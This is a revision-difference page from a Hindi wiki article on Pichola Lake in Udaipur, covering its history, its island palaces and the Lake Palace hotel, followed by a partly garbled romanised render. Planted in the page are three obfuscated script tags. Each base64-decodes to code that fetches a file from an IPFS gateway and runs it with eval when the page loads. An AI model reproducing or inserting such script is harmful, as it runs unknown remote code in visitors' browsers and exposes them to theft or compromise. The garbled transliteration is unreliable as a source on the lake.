Difference between revisions of "पिछोला झील"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 2: Line 2:
 
----
 
----
 
*[[उदयपुर]] [[राजस्थान]] का एक ख़ूबसूरत शहर है। और [[उदयपुर पर्यटन]] का सबसे आकर्षक स्थल माना जाता है।  
 
*[[उदयपुर]] [[राजस्थान]] का एक ख़ूबसूरत शहर है। और [[उदयपुर पर्यटन]] का सबसे आकर्षक स्थल माना जाता है।  
 +
[[चित्र:Pichola-Lake-Udaipur.jpg|thumb|250px|पिछोला झील, [[उदयपुर]]<br />Pichola Lake, Udaipur]]
 
*पिछोला झील उदयपुर की सबसे प्रसिद्ध झील है और यह सबसे सुन्दरतम है।  
 
*पिछोला झील उदयपुर की सबसे प्रसिद्ध झील है और यह सबसे सुन्दरतम है।  
 
*इसके बीच में [[जग मंदिर उदयपुर|जग मन्दिर]] और जग निवास महल है जिनका प्रतिबिम्ब झील में पड़ता है।  
 
*इसके बीच में [[जग मंदिर उदयपुर|जग मन्दिर]] और जग निवास महल है जिनका प्रतिबिम्ब झील में पड़ता है।  
Line 8: Line 9:
 
*यह झील लगभग 7 किलोमीटर चौड़ी है।  
 
*यह झील लगभग 7 किलोमीटर चौड़ी है।  
 
*इस झील में स्थित दो टापुओं पर जग मंदिर और जग-निवास दो सुंदर महल बने हैं। अब इन महलों को एक पंच-सितारा होटल (लेक पैलेस होटल) में बदल दिया गया है। जिसे राजस्थान, उदयपुर के भूतपूर्व [[राणा भगवन्त सिंह]] चलाते हैं।
 
*इस झील में स्थित दो टापुओं पर जग मंदिर और जग-निवास दो सुंदर महल बने हैं। अब इन महलों को एक पंच-सितारा होटल (लेक पैलेस होटल) में बदल दिया गया है। जिसे राजस्थान, उदयपुर के भूतपूर्व [[राणा भगवन्त सिंह]] चलाते हैं।
 +
{{लेख प्रगति
 +
|आधार=
 +
|प्रारम्भिक=प्रारम्भिक1
 +
|माध्यमिक=
 +
|पूर्णता=
 +
|शोध=
 +
}}
 +
==संबंधित लेख==
 +
{{राजस्थान के पर्यटन स्थल}}
  
 +
[[Category:राजस्थान]][[Category:उदयपुर के पर्यटन स्थल]][[Category:पर्यटन_कोश]][[Category:भारत की झीलें]]
 
__INDEX__
 
__INDEX__
[[Category:राजस्थान]][[Category:उदयपुर के पर्यटन स्थल]][[Category:पर्यटन_कोश]][[Category:भारत की झीलें]]
 

Revision as of 07:58, 2 October 2010

[[chitr:Udaipur-Panoramic-View.jpg|udayapur nagar ka pichhola jhil se vihangam drishy
Panoramic View of Udaipur City Across The Pichola Lake|thumb|center|600px]]


[[chitr:Pichola-Lake-Udaipur.jpg|thumb|250px|pichhola jhil, udayapur
Pichola Lake, Udaipur]]

  • pichhola jhil udayapur ki sabase prasiddh jhil hai aur yah sabase sundaratam hai.
  • isake bich mean jag mandir aur jag nivas mahal hai jinaka pratibimb jhil mean p data hai.
  • isaka nirman 14vian shatabdi ke ant mean rana lakha ke shasanakal mean ek banjare ne karaya tha aur bad mean raja udayasianh ne ise thik karaya.
  • badashah banane se pahale shahajahaan bhi is jhil ke mahaloan mean akar thahara tha.
  • yah jhil lagabhag 7 kilomitar chau di hai.
  • is jhil mean sthit do tapuoan par jag mandir aur jag-nivas do suandar mahal bane haian. ab in mahaloan ko ek panch-sitara hotal (lek pailes hotal) mean badal diya gaya hai. jise rajasthan, udayapur ke bhootapoorv rana bhagavant sianh chalate haian.
panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>